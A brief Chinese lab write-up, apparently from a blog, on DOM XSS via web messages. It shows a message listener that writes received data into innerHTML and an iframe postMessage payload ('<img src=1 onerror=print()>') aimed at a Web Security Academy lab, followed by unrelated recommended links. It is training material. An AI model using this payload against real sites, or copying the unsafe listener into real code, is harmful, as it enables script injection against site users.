CTF-WEB: 利用Web消息造成DOM XSS

如果索引中有类似如下代码

js 复制代码
<!-- Ads to be inserted here -->
<div id='ads'>
</div>
<script>
    window.addEventListener('message', function(e) {
        document.getElementById('ads').innerHTML = e.data;
    });
</script>
  • 这行代码的作用是将接收到的消息内容(e.data)设置为 id'ads' 的元素的 HTML 内容

那么在受害者段执行如下代码会导致DOM污染

html 复制代码
<iframe src="https://YOUR-LAB-ID.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">

参考

实验:使用 Web 消息的 DOM XSS |网络安全学院

相关推荐
马立杰19 小时前
IE241216_准入认证技术
安全·网络安全·交换安全
白猫不黑20 小时前
AI时代如何利用AI学好网络安全
人工智能·安全·web安全·计算机·网络安全·信息安全
佳&弥21 小时前
后渗透痕迹清理
服务器·windows·web安全·网络安全
2501_9159214321 小时前
抓包工具对比:Charles、TraceEagle、Wireshark、Fiddler 与 Proxyman
网络协议·计算机网络·网络安全·ios·adb·https·udp
Shi-p1 天前
实战|分布式诱捕威胁情报 TrapCloud,无需本地部署,实现公网攻击源主动封堵
网络安全·威胁分析
Johny_Zhao1 天前
网络安全等级保护测评实施方案
linux·网络·人工智能·网络安全·信息安全·云计算·等保测评·系统运维·itsm
菩提小狗1 天前
每日安全情报报告 · 2026-09-06
网络安全·漏洞·cve·安全情报·每日安全
HackTwoHub2 天前
BurpSuite2026.8专业(稳定版)下载Windows/Linux/Mac支持Java21以上(新增Burp AT智能体)
linux·运维·服务器·安全·macos·网络安全·自动化
Chockmans2 天前
SRC---信息收集(灯塔自动化推荐)
网络安全
数据知道2 天前
YARA 规则编写实战——从样本到检测规则
网络·安全·网络安全